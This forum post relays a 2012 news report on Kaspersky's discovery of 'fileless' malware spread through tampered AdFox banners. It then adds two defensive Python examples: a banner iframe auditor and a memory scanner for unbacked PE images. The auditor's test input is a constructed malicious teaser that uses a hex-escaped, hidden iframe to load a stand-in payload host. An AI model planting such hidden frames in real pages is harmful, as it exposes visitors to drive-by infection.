Terpe
28th March 2012, 08:09
Malware authors have come up with a new breed of "fileless" malware that threatens to thwart traditional antivirus software, a computer security firm said.
Kaspersky Labs said it first encountered such malware on a Russian news site, where it injected the malware into the victim computer's memory rather than writing it to the hard drive.
"Because no file is written to the hard drive, it becomes much harder to detect the problem using antivirus software. If the exploit is not detected, the bot can be successfully loaded into RAM, becoming virtually invisible," it said in a blog post.
"This attack targeted Russian users. However, we cannot rule out that the same exploit and the same fileless bot will be used against people in other parts of the world: they can be distributed via similar banner or teaser networks in other countries. It is likely that other malware, not just Trojan-Spy.Win32.Lurk will be used in the process," it added.
However, Kaspersky noted that this is not the first malware to operate entirely in the infected computer's RAM: the Code Red and Slammer worms did so too.
It said the latest example was found on Russian news sites, where it spread through the code served by an advertisement management system.
"We discovered that the malware is loaded via the teasers on AdFox.ru," it said.
Infection
Kaspersky said a JavaScript for one of the teasers loaded on the site included an iframe that redirected the user to a malicious site in the .EU domain containing a Java exploit.
An analysis of the exploit's JAR file showed that it exploits a Java vulnerability (CVE-2011-3544) that cybercriminals have been exploiting since November 2011.
"After seizing all necessary privileges on the victim computer, the exploit does not install malware on the hard drive using Java. Instead, it uses its payload to inject an encrypted dll from the web directly into the memory of the javaw.exe process. The address from which the library is to be downloaded is encrypted in the iframe that was included in the JS script downloaded from AdFox.ru," it said.
Kaspersky said this kind of malware remains operational until the operating system is restarted, but in this case this is not a critical issue for the Trojan’s authors.
"One reason for this is that the ‘fileless’ malware operates as a bot: after sending a series of requests to the command server and receiving replies, the exploit uses several different methods to disable UAC (User Account Control). After this the bot can install the Lurk Trojan on the infected machine. It is worth noting that the decision as to whether to install Lurk on the system is made on the cybercriminals’ server," it said.
A second reason is that the chances of the user returning to the infected website after rebooting the system are high and would result in re-infection.
Adfox notification
Kaspersky said it notified the Adfox administration of the incident and they promptly took action, resulting in the detection and removal of the malware from the infected banner.
"In the course of the investigation it was determined that the cybercriminals had used the account of an Adfox customer to change the code of news headline banners by adding an iframe redirecting users to the malicious site," it said.
Source:-
http://www.gmanetwork.com/news/story/252937/scitech/technology/new-fileless-malware-discovered
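The Adfox incident described above (a customer account used to add an iframe to news headline banner code) and the teaser-to-iframe chain in the Infection section are the kind of change an ad network can audit for before the banner is served. The following is an added example, not code from the original post, from Kaspersky or from Adfox: it extracts every iframe in a piece of banner code, including ones written from JavaScript strings with `\x3c` style escapes, and flags those that point at a host outside the network's allowlist or that are sized or styled to be invisible. The allowlist, the sample teaser code and the `.invalid` host name are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: hosts that banner code served by the ad network may reference.
ALLOWED_HOSTS = {"adfox.ru"}


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a piece of markup."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


# A JS string literal: a quote, the shortest run of anything, the matching unescaped quote.
_JS_STRING = re.compile(r"""(['"])(.*?)(?<!\\)\1""", re.S)


def _unescape_js(s):
    """Undo the escapes banner code uses to keep '<iframe' out of a naive grep."""
    s = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)
    s = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return s.replace("\\/", "/").replace("\\'", "'").replace('\\"', '"')


def _parse_iframes(markup):
    c = _IframeCollector()
    c.feed(markup)
    c.close()
    return c.iframes


def extract_iframes(code):
    """Return iframes found both as literal markup and inside JS string literals."""
    found = list(_parse_iframes(code))
    for _quote, body in _JS_STRING.findall(code):
        body = _unescape_js(body)
        if "<iframe" in body.lower():
            found.extend(_parse_iframes(body))
    unique, seen = [], set()
    for f in found:  # the same iframe can be seen by both passes; report it once
        key = tuple(sorted(f.items()))
        if key not in seen:
            seen.add(key)
            unique.append(f)
    return unique


def _host_allowed(host, allowed):
    return any(host == a or host.endswith("." + a) for a in allowed)


def audit_banner(code, allowed_hosts=ALLOWED_HOSTS):
    """Flag iframes that point off the allowlist or are hidden from the viewer."""
    findings = []
    for f in extract_iframes(code):
        src = f.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if host and not _host_allowed(host, allowed_hosts):
            reasons.append("host not allowlisted")
        dims = (f.get("width", ""), f.get("height", ""))
        if any(d.strip().rstrip("px") in ("0", "1") for d in dims):
            reasons.append("zero-size frame")
        style = f.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via CSS")
        if reasons:
            findings.append({"src": src, "host": host, "reasons": reasons})
    return findings


# Constructed sample banner code (not real AdFox code). The clean teaser only writes a headline link.
CLEAN_TEASER = """
document.write('<div class="teaser"><a href="http://ads.adfox.ru/click?id=1">Headline</a></div>');
"""

# The tampered copy appends a hidden 1x1 iframe, spelled with hex escapes, that points at an
# off-network host (constructed; the .invalid TLD never resolves).
TAMPERED_TEASER = CLEAN_TEASER + """
document.write('\\x3ciframe src="http://payload.eu.invalid/x/" width="1" height="1" style="display:none"\\x3e\\x3c/iframe\\x3e');
"""

if __name__ == "__main__":
    for finding in audit_banner(TAMPERED_TEASER):
        print(finding["src"], "->", ", ".join(finding["reasons"]))
```

Run on the clean teaser the audit returns nothing; on the tampered copy it reports the single injected frame with all three reasons. The string-literal pass matters because an iframe written via `document.write` never appears as literal `<iframe` in the banner source, which is exactly what a grep-based review of the banner code would miss.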
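Because the bot described above lives only in the memory of javaw.exe, a scan of the disk finds nothing; the place to look is the process's memory map, for executable regions that no file on disk backs and whose first bytes are a DLL's PE header (the check that Volatility's malfind performs over Windows VADs). The following is an added example, not code from the original post or from Kaspersky: it implements that check in Python over the Linux /proc/<pid>/maps format, used here as a stand-in for a Windows VAD walk, with the map listing, the region contents and the `read_region` reader all constructed for the example.

```python
import re
import struct

# One line of Linux /proc/<pid>/maps: "start-end perms offset dev inode [path]".
_MAPS_RE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+[0-9a-f]+\s+\S+\s+\d+\s*(.*)$"
)


def parse_maps(text):
    """Parse /proc/<pid>/maps text into region dicts (start, end, perms, path)."""
    regions = []
    for line in text.splitlines():
        m = _MAPS_RE.match(line.strip())
        if not m:
            continue
        regions.append({
            "start": int(m.group(1), 16),
            "end": int(m.group(2), 16),
            "perms": m.group(3),
            "path": m.group(4).strip(),
        })
    return regions


def looks_like_pe(data):
    """True if data starts with a DOS header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def find_unbacked_pe(maps_text, read_region, probe=0x1000):
    """Return executable, non-file-backed regions whose first page carries a PE image.

    read_region(start, length) supplies the bytes; on a live system it would read
    /proc/<pid>/mem (or call ReadProcessMemory on Windows).
    """
    hits = []
    for r in parse_maps(maps_text):
        if "x" not in r["perms"]:
            continue  # not executable: cannot be the running payload
        if r["path"] and not r["path"].startswith("["):
            continue  # backed by a file on disk: a normally loaded .so/DLL
        data = read_region(r["start"], min(probe, r["end"] - r["start"]))
        if looks_like_pe(data):
            hits.append(r)
    return hits


# Constructed sample data (not from any real capture).
_FAKE_PE = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)   # DOS header, e_lfanew = 0x80
            + b"\0" * (0x80 - 0x40) + b"PE\0\0" + b"\x64\x86"  # PE signature, Machine = AMD64
            + b"\0" * 0x100)
_JIT_CODE = b"\x55\x48\x89\xe5\x48\x83\xec\x10" + b"\xcc" * 0x100  # push rbp; mov rbp,rsp; ...

SAMPLE_MAPS = """\
7f3a10000000-7f3a10c00000 r-xp 00000000 08:01 2626   /usr/lib/jvm/java/lib/server/libjvm.so
7f3a12000000-7f3a12400000 rwxp 00000000 00:00 0
7f3a13000000-7f3a13010000 rwxp 00000000 00:00 0
7f3a14000000-7f3a14020000 rw-p 00000000 00:00 0
7ffd5c000000-7ffd5c021000 rw-p 00000000 00:00 0      [stack]
"""

_SAMPLE_MEMORY = {
    0x7f3a12000000: _JIT_CODE,  # legitimate JIT code cache: anonymous and executable, no PE header
    0x7f3a13000000: _FAKE_PE,   # reflectively loaded DLL: anonymous, executable, PE header
    0x7f3a14000000: _FAKE_PE,   # DLL bytes sitting in a data buffer: not executable
}


def sample_read_region(start, length):
    return _SAMPLE_MEMORY.get(start, b"\0" * length)[:length]


def scan_sample():
    """Run the check over the constructed sample; returns the flagged (start, end) pairs."""
    return [(r["start"], r["end"]) for r in find_unbacked_pe(SAMPLE_MAPS, sample_read_region)]


if __name__ == "__main__":
    for start, end in scan_sample():
        print(f"unbacked executable PE image at {start:x}-{end:x}")
```

Only the third region is reported. The PE-header test is what keeps the check usable on a Java process at all: the JVM's JIT code cache is legitimately anonymous and executable, so "executable and not file-backed" alone would fire on every running JVM. The caveat cuts the other way too: a loader that wipes the MZ/PE headers after mapping the DLL evades this particular test, which is why a memory scan should be paired with the network-side indicators (the download of the encrypted library, the command-server traffic) that the post also describes.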